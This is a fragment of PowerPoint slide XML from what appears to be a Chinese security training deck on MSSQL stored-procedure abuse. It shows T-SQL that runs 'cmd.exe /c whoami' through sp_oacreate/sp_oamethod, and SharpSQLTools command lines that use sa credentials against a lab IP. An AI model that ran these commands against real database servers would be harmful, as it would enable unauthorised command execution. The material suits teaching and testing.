          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E65793DC-4920-4382-939E-6859FA1FE4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606361" y="3938509"/>
            <a:ext cx="6393271" cy="1746649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3675651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1"/>
            <a:ext cx="11035409" cy="2339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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的实例。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rPr>
              <a:t>组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>组件执行命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367225" y="3978445"/>
            <a:ext cx="5023695" cy="209287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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>declare @luan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>int,@exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>int,@text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>int,@str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> varchar(8000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>luan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> output;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @luan,'exec',@exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>output,'C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>:\windows\system32\cmd.exe /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @exec, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>StdOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>out;exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @text, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>readall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @str out;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>select @str;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7CBDDE-68B1-4D4B-BE1E-CBF841E7A0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856076" y="4505085"/>
            <a:ext cx="6039009" cy="972409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11047998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1"/>
            <a:ext cx="11035409" cy="2339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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的实例。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SharpSQLTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>工具利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367225" y="4311399"/>
            <a:ext cx="5199967" cy="110799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en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 sa ICQsafe666 master enable_ole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 sa ICQsafe666 master sp_oacreate whoami</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3304F780-8988-4854-ADCF-2ABC2652B402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012761" y="4243641"/>
            <a:ext cx="5884313" cy="1232172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22457933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1"/>
            <a:ext cx="11035409" cy="332398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本地存储过程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本地存储过程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本地存储过程指用户创建的自定义存储过程。如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，公共语言基础结构（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
